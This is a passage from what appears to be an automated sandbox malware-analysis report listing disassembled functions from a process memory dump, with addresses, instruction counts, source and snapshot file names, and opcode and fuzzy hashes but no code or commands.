                                                                                      • Instruction Fuzzy Hash: 4F31D571B1DA095FEB6CAE4C68566B977D1EB99724F40013FF44AC3292ED26780242C6
                                                                                      Function 00007FFD99E2AFD3 Relevance: .1, Instructions: 141COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f90ff5cc59de4937d611ee0b0261ec90586e5a076f524e9accbe7a931f4d2b49
                                                                                      • Instruction ID: c17046e63646c4b6562a0e21e0c08834e29d81b59efa138d320536c5f1f5a16b
                                                                                      • Opcode Fuzzy Hash: f90ff5cc59de4937d611ee0b0261ec90586e5a076f524e9accbe7a931f4d2b49
                                                                                      • Instruction Fuzzy Hash: 7C31C616B0E55A4BE3517AAD7CA54FA7B90DF8223D70D82B7D19CC90DBEC08148A82D6
                                                                                      Function 00007FFD99E2AF98 Relevance: .1, Instructions: 136COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f8e8f368c4fd5b3eefbdf11e530c9ae88684b09da6e01a4b28e293fa24b83f89
                                                                                      • Instruction ID: dc77591158c184c2b36ef40ec47c2322b2dde71cedee54ae541c7bd7dd9b17c5
                                                                                      • Opcode Fuzzy Hash: f8e8f368c4fd5b3eefbdf11e530c9ae88684b09da6e01a4b28e293fa24b83f89
                                                                                      • Instruction Fuzzy Hash: A1419270709A184FDB18EF58C4919BD77E1FF98314B50016DE44A877D3CA29F842CB92
                                                                                      Function 00007FFD99E2A30D Relevance: .1, Instructions: 134COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9ebdb03224b9e6eb472074c61cee9a9c70a011e994455d1634ff866f7f0b7d88
                                                                                      • Instruction ID: b53c11e392b6736c3c9f5a1aacc4329b0c06e33395e8e01e59f39a4e0cd48acf
                                                                                      • Opcode Fuzzy Hash: 9ebdb03224b9e6eb472074c61cee9a9c70a011e994455d1634ff866f7f0b7d88
                                                                                      • Instruction Fuzzy Hash: B931E822B0E94A4FD790EE5CD8E45FA73D1FFA831CB044677D08DC719ADD2AA5428382
                                                                                      Function 00007FFD99E26842 Relevance: .1, Instructions: 132COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 10069e7211201a7691dac546a8830c6b3fea62b3330072ae942f4843be894810
                                                                                      • Instruction ID: 3476697deba44b2cf25a3a0ef04ddee98bbc6766c7b5d941f9b6e79bbeb7109f
                                                                                      • Opcode Fuzzy Hash: 10069e7211201a7691dac546a8830c6b3fea62b3330072ae942f4843be894810
                                                                                      • Instruction Fuzzy Hash: FD414920A1E6865FE72A4F6444A507D7BE1EF56B18B1443BFD0C6C71D6DE2A7842C342
                                                                                      Function 00007FFD99E41230 Relevance: .1, Instructions: 130COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9bac67e667ac5d811b39fba3b81828ad81fabb70eb279a1b436e5eb84200b7e6
                                                                                      • Instruction ID: dc9828e408436623f7a6b577b99cc5b3940d062531f76c04bc9d7169d032b088
                                                                                      • Opcode Fuzzy Hash: 9bac67e667ac5d811b39fba3b81828ad81fabb70eb279a1b436e5eb84200b7e6
                                                                                      • Instruction Fuzzy Hash: 43411862A0E7C51FDB678B7848B91A43FE1DF6725470A40FBD088CB1E3E8596C468352
                                                                                      Function 00007FFD99E22173 Relevance: .1, Instructions: 129COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8fb67322d740d6c70a83c9ea8cbbdef5dc1734c1f154338d66ad61f89269f620
                                                                                      • Instruction ID: 16c41a2c06a79a886dfdc1c3032a0e0e5cd9586e4fcd4aa919da2c56d4ce0395
                                                                                      • Opcode Fuzzy Hash: 8fb67322d740d6c70a83c9ea8cbbdef5dc1734c1f154338d66ad61f89269f620
                                                                                      • Instruction Fuzzy Hash: B9412434B18A4E4FDBC8EF58C4A5AA973E2FF58304B5445A4D42DC729ACE35E852CB41
                                                                                      Function 00007FFD99E56520 Relevance: .1, Instructions: 129COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ffb3dae9818ddfb36ae80eb775577b4fb38be3be9150b3ad5bcd287bd6e1c89a
                                                                                      • Instruction ID: d923d71a73855cb809f6bde3f293b5593731025c281fc66443bebe4c221d8abe
                                                                                      • Opcode Fuzzy Hash: ffb3dae9818ddfb36ae80eb775577b4fb38be3be9150b3ad5bcd287bd6e1c89a
                                                                                      • Instruction Fuzzy Hash: DC314C3170D9490FEB94EA6C54A667677C2EFD977471405B9D44EC729BCC15BC028382
                                                                                      Function 00007FFD99E28F93 Relevance: .1, Instructions: 129COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d9914189225009d6a663284116e4fd28d03dcb2661f002b401900b7dc53134b3
                                                                                      • Instruction ID: ef04904693dd6fcc240124a4c33428b6f8b211eea66da5d92303334be453af97
                                                                                      • Opcode Fuzzy Hash: d9914189225009d6a663284116e4fd28d03dcb2661f002b401900b7dc53134b3
                                                                                      • Instruction Fuzzy Hash: 26312C3160E7CD0FD756DF7888645667FE5FF8A224B0802EED499C7193C9299807C342
                                                                                      Function 00007FFD99E12203 Relevance: .1, Instructions: 126COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1d63f358a6c0de8f7163d85cd24ae7034c3a415077ef40ab7bcf062ce54ca1b4
                                                                                      • Instruction ID: 457e2025c414400f636388df8450bd9485aade292acb2bc3bca0f8ba4c130134
                                                                                      • Opcode Fuzzy Hash: 1d63f358a6c0de8f7163d85cd24ae7034c3a415077ef40ab7bcf062ce54ca1b4
                                                                                      • Instruction Fuzzy Hash: 71319231908A0C8FDB68DF58D849BB9B7F1FB98315F00822ED00EE3655CF71A8568B81
                                                                                      Function 00007FFD99E1626C Relevance: .1, Instructions: 122COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c9c61144783348a208fbe28f5df4b30e01ec86cca8794b311876b9b77f835b68
                                                                                      • Instruction ID: 456a63afa73d3bb326ac0508accaa6eee55006a5682d1a1def64ac70c2d84c2d
                                                                                      • Opcode Fuzzy Hash: c9c61144783348a208fbe28f5df4b30e01ec86cca8794b311876b9b77f835b68
                                                                                      • Instruction Fuzzy Hash: A431C232B1A55D4FEB60EFA898A56FE7BF0EF48204F04047AD049D3193CE2968018352
                                                                                      Function 00007FFD99E15F7A Relevance: .1, Instructions: 122COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2aa3791fbe2711532a29ea2eb41af72307586ee4f2fb5584fb92dbb60214bc53
                                                                                      • Instruction ID: 2c2e6ada8073039692321315145e40c4811bd6840cba44ad3f4c508d9acfac7c
                                                                                      • Opcode Fuzzy Hash: 2aa3791fbe2711532a29ea2eb41af72307586ee4f2fb5584fb92dbb60214bc53
                                                                                      • Instruction Fuzzy Hash: 7941BA21A1EA8A4FD776ABB888756E97FE1EF46314B0500FBD05DC71E7CD1D58058342
                                                                                      Function 00007FFD99E2BB28 Relevance: .1, Instructions: 114COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3ecfdd8e9743b2a18c2d7439358a7e52c10a481f1bb3490ef61795828208c06e
                                                                                      • Instruction ID: afb29966d16ce9ccf0133e992e9af3c65d4a4561cfa752801e02115ef9479c79
                                                                                      • Opcode Fuzzy Hash: 3ecfdd8e9743b2a18c2d7439358a7e52c10a481f1bb3490ef61795828208c06e
                                                                                      • Instruction Fuzzy Hash: F1310821B1EA4E0FDB75EE6C84B5A7A77D1EF55314B144ABAD04DC3196CE29BC028382
                                                                                      Function 00007FFD99E1858C Relevance: .1, Instructions: 114COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 095b80d6a2d6dd8656b80d63470cdc736bd4811f885d919db87cfdb5f92a45c8
                                                                                      • Instruction ID: 7049d00caa902fe12d2580f9839e1864abf52e3d56a2a2e57f83422cabf0b596
                                                                                      • Opcode Fuzzy Hash: 095b80d6a2d6dd8656b80d63470cdc736bd4811f885d919db87cfdb5f92a45c8
                                                                                      • Instruction Fuzzy Hash: F2211340B0AB2E4EE79D7B99A1BE5BD20468F88604F280C34E16ED15C7CD1E2501A14B
                                                                                      Function 00007FFD99E10E30 Relevance: .1, Instructions: 112COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 78fdf23e526b1ee16ffdd3f502f93876881d30e6c59d5dd2c99b60ef377879ef
                                                                                      • Instruction ID: e9ec26c9472099f7b8f1fea7de24f5b1dcc9f217e22beb0388c58f54741cb190
                                                                                      • Opcode Fuzzy Hash: 78fdf23e526b1ee16ffdd3f502f93876881d30e6c59d5dd2c99b60ef377879ef
                                                                                      • Instruction Fuzzy Hash: 9931F860B1CB841BE315AB7C5C2B5BABBD1DF8A204F54057DF48AC32E7DD59B8028287
                                                                                      Function 00007FFD99E2B818 Relevance: .1, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 45f850f10cf4f43bd44f032fc38c4eb9563c141d76ff7b169fe21132f6f3d607
                                                                                      • Instruction ID: 037093e38dd412433ecfb8fda34d7382d8be7aa15b5fb2cc5fbeaaa984624c39
                                                                                      • Opcode Fuzzy Hash: 45f850f10cf4f43bd44f032fc38c4eb9563c141d76ff7b169fe21132f6f3d607
                                                                                      • Instruction Fuzzy Hash: 6D21F572B1DA494FDB5CAE189C569F933D0EBA8318F04003EF45F836DBDD25B8468286
                                                                                      Function 00007FFD99E12E1F Relevance: .1, Instructions: 110COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5ff79b94ec3ef5be0d9fd0e157875d4b1444c2f487c3ebbe3263dbf793e82b8c
                                                                                      • Instruction ID: 2c8687a4d7141d1e6f3e21fa92212d261ce714a547ab74ded78e6682d56ba9c9
                                                                                      • Opcode Fuzzy Hash: 5ff79b94ec3ef5be0d9fd0e157875d4b1444c2f487c3ebbe3263dbf793e82b8c
                                                                                      • Instruction Fuzzy Hash: 5431F860B1CB841FD315AB7C582A5B9BBD1DF8A204F4405BEF48AC32E7DD59A8028287
                                                                                      Function 00007FFD99E1E51A Relevance: .1, Instructions: 109COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6af3f16c4e9407c56dec35e974e3c593b6bfb93a5cd187d67f71bf4feacf22f3
                                                                                      • Instruction ID: 5d5ac2012716423104e5a61869df0fbc848fd94d3e8ce39a2f7c3f8eb41fc404
                                                                                      • Opcode Fuzzy Hash: 6af3f16c4e9407c56dec35e974e3c593b6bfb93a5cd187d67f71bf4feacf22f3
                                                                                      • Instruction Fuzzy Hash: 7B312925F0E94A4AF734AEA458724F977C0EFA5368F44057DF06DC30D2EE1AA50A4383
                                                                                      Function 00007FFD99E17030 Relevance: .1, Instructions: 108COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c3a9ea34708d55813253b7e63058ad95d22fff343d5497c5a5e05be831008958
                                                                                      • Instruction ID: c05c76d7cbfdcfb0e95909b830b6179ef56c82ab208a317c7f72eb27d7f6e6ed
                                                                                      • Opcode Fuzzy Hash: c3a9ea34708d55813253b7e63058ad95d22fff343d5497c5a5e05be831008958
                                                                                      • Instruction Fuzzy Hash: 33210953B1FBC94FEB754AAC6C611A87F94EF91694B0801FBD098CB0B7D81B5D058386
                                                                                      Function 00007FFD99E140DC Relevance: .1, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 38b8defceb46c1770c2f1cf0ad615e502fb65e9653c5b072a3dd7ad4f638dbd6
                                                                                      • Instruction ID: f81bcae4be35aa1ac7d1283ada5f5075b22ea41bca411c28ca5659514e268242
                                                                                      • Opcode Fuzzy Hash: 38b8defceb46c1770c2f1cf0ad615e502fb65e9653c5b072a3dd7ad4f638dbd6
                                                                                      • Instruction Fuzzy Hash: AF314030B1860E8FDB98DF58C8A4AB973A1FF98314F544229D42AD73D5DA35A852CB41
                                                                                      Function 00007FFD99E63CE8 Relevance: .1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 622851ff986e38b68f954c23d1931840b771bd6901fb148b411c8516f153ef7d
                                                                                      • Instruction ID: 2b818e5979e8e1a82e79fe702115764b2a1aa5ed25aa9d5c2ba17dc7e1cda0c6
                                                                                      • Opcode Fuzzy Hash: 622851ff986e38b68f954c23d1931840b771bd6901fb148b411c8516f153ef7d
                                                                                      • Instruction Fuzzy Hash: 1621483070D7894FE7699B2888A5BB53BD5EF92318F2400BED48DC61D7D91BAC42C352
                                                                                      Function 00007FFD99E26FB2 Relevance: .1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1aeae97573e5730b4048c70c06995c794c7e124a084911c4f16f9fabbbea7835
                                                                                      • Instruction ID: 1954337f59a8204f064dfda595e271293aba8ddefb8a623d35a4af89a1407fb8
                                                                                      • Opcode Fuzzy Hash: 1aeae97573e5730b4048c70c06995c794c7e124a084911c4f16f9fabbbea7835
                                                                                      • Instruction Fuzzy Hash: ED21F732E0A55D8AEB70AAA458619FE77E8EF85318F0501B6D45CC30C2EE2B791D4687
                                                                                      Function 00007FFD99E163EC Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d4bd25571e7a390fa2a3d0e641a7df821b792959b71cfadbe7f54fa07848ae90
                                                                                      • Instruction ID: 6c55ca46817f0818dc1950d556e052b5b5da8bc6e413be1a4a4c0a2225ee601c
                                                                                      • Opcode Fuzzy Hash: d4bd25571e7a390fa2a3d0e641a7df821b792959b71cfadbe7f54fa07848ae90
                                                                                      • Instruction Fuzzy Hash: DE31A172B1995D4FDB64EFA898A56FE7BF1FF59304F4400BAD009E71A2CE2868018742
                                                                                      Function 00007FFD99E24842 Relevance: .1, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 18c28066dc996264af3a40c07c2dae8a929c9cd1b5206a4f9752aa090855e27a
                                                                                      • Instruction ID: b2440fbdd6be0b4f6c965b176bbf57ca383cb939917427e6f63fcd0ddfa7ad47
                                                                                      • Opcode Fuzzy Hash: 18c28066dc996264af3a40c07c2dae8a929c9cd1b5206a4f9752aa090855e27a
                                                                                      • Instruction Fuzzy Hash: 39210836F1D59E0BF774AAA898611FD77D0EF49358F050176E45CC308BFE2A69094683
                                                                                      Function 00007FFD99E25860 Relevance: .1, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a2cc3dc28b39e881e82f72c09cf83fc35b857b8bc19020682be774745399e48b
                                                                                      • Instruction ID: a5848f5b97b6ab9a6da181d7038bd881f31b92d73916680a013dcf0d66482a52
                                                                                      • Opcode Fuzzy Hash: a2cc3dc28b39e881e82f72c09cf83fc35b857b8bc19020682be774745399e48b
                                                                                      • Instruction Fuzzy Hash: 96210B21F1DA090FE7A4AB2C94655BD77D0EF98358F04067BE84DC21A5ED1999414383
                                                                                      Function 00007FFD99E504C0 Relevance: .1, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4c09f13eb6dac7fe801844355c00c8fcee0949a8e892c1b5044f46cd8d3ebb47
                                                                                      • Instruction ID: 9277dbb2e7b9e3956108c34bfcf00e5342a6469dc23f3547dbf4fd64bd8adbb3
                                                                                      • Opcode Fuzzy Hash: 4c09f13eb6dac7fe801844355c00c8fcee0949a8e892c1b5044f46cd8d3ebb47
                                                                                      • Instruction Fuzzy Hash: 1121C561B1DD1E0FEEB4DD9D54A5A7573C1EBA5329B40027AE44EC3296DD16FC024382
                                                                                      Function 00007FFD99E19E7C Relevance: .1, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7fa8d746ddb0dd020726f9ce7a88d9f84f035486c3806651385c80b31697f4db
                                                                                      • Instruction ID: 6d3f2c1f56dd1d89a884337da3788b20a4ddb060aa4df24c12115a3dcff34b84
                                                                                      • Opcode Fuzzy Hash: 7fa8d746ddb0dd020726f9ce7a88d9f84f035486c3806651385c80b31697f4db
                                                                                      • Instruction Fuzzy Hash: 33318770608A8E8FDB95DF58C4A8BE977E1FF5C314F1845BAD81DC7296CA34A841C701
                                                                                      Function 00007FFD99E5B9A0 Relevance: .1, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 95229c3d672a6bc3003bb5ace600ba5d3b89a059231cd93a7e2c92d197c2f2c5
                                                                                      • Instruction ID: 2260cff053c189ecd8887455d7d59851e42679cb1395fd97842add7919f569b9
                                                                                      • Opcode Fuzzy Hash: 95229c3d672a6bc3003bb5ace600ba5d3b89a059231cd93a7e2c92d197c2f2c5
                                                                                      • Instruction Fuzzy Hash: 9921C731A1CA450FD75CEA1898969BA77D0EBA5328F04002FF09E831EBDD65A8468387
                                                                                      Function 00007FFD99E28FF4 Relevance: .1, Instructions: 95COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ac70530ad6cb3fcebfd87f77acb01ffd8b7aa973e2590425c960e48686b0bace
                                                                                      • Instruction ID: 1261184f7164d6eae56679fe11320fe55ff84cb56ac3fec0eac58cf938ddb9d5
                                                                                      • Opcode Fuzzy Hash: ac70530ad6cb3fcebfd87f77acb01ffd8b7aa973e2590425c960e48686b0bace
                                                                                      • Instruction Fuzzy Hash: F221F66160E7C50FD3579B7888655667FE1DF8B62470901EFD0C9CB1A3C95DA80BC352
                                                                                      Function 00007FFD99E2BA20 Relevance: .1, Instructions: 94COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c67665b61ea291585993b449cd8f13985e350e06cfd41c4ef451a1308c5c33cf
                                                                                      • Instruction ID: 49c7364c83dc3a0a17a0ce950ab3e1ea3a05ab6ba6989b534a119379552bcd0b
                                                                                      • Opcode Fuzzy Hash: c67665b61ea291585993b449cd8f13985e350e06cfd41c4ef451a1308c5c33cf
                                                                                      • Instruction Fuzzy Hash: A121083171DF085FE768EA5C949A97A77D1EB99215B00023EF44EC3262ED26BC4287C3
                                                                                      Function 00007FFD99E12A5A Relevance: .1, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
